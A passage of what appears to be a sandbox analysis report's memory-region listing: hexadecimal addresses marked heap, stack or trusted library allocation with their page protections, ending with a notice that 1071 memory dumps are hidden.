page read and write
2350036A000
trusted library allocation
page read and write
1BDC9546000
heap
page read and write
1BDC96B0000
heap
page read and write
7FFE16530000
trusted library allocation
page read and write
7FFE168A0000
trusted library allocation
page read and write
2BDA8776000
heap
page read and write
1BCBC000
stack
page read and write
7FFE16750000
trusted library allocation
page read and write
7FFE1654D000
trusted library allocation
page execute and read and write
26455A1E000
trusted library allocation
page read and write
7FFE16860000
trusted library allocation
page read and write
7FFE166A9000
trusted library allocation
page read and write
23500879000
trusted library allocation
page read and write
2BDA8890000
heap
page read and write
1B932000
heap
page read and write
1BDCBFE1000
heap
page read and write
15FE7DE6000
heap
page read and write
C0CFF4F000
stack
page read and write
7B0000
heap
page read and write
1BDC9539000
heap
page read and write
7FFE16770000
trusted library allocation
page read and write
7FFE165C6000
trusted library allocation
page read and write
1BDC9567000
heap
page read and write
1BDC9510000
heap
page read and write
22023323000
trusted library allocation
page read and write
3B6C7DD000
stack
page read and write
7FFE16810000
trusted library allocation
page read and write
208B2A60000
heap
page read and write
25E9C289000
trusted library allocation
page read and write
2357E0F0000
heap
page read and write
7FFE16620000
trusted library allocation
page execute and read and write
7FFE1658C000
trusted library allocation
page execute and read and write
22AEA960000
heap
page read and write
7FFE16523000
trusted library allocation
page execute and read and write
2646DAF5000
heap
page read and write
22AD064B000
heap
page read and write
D44CCFE000
stack
page read and write
12AF1000
trusted library allocation
page read and write
26455877000
trusted library allocation
page read and write
There are 1071 hidden memdumps, click here to show them.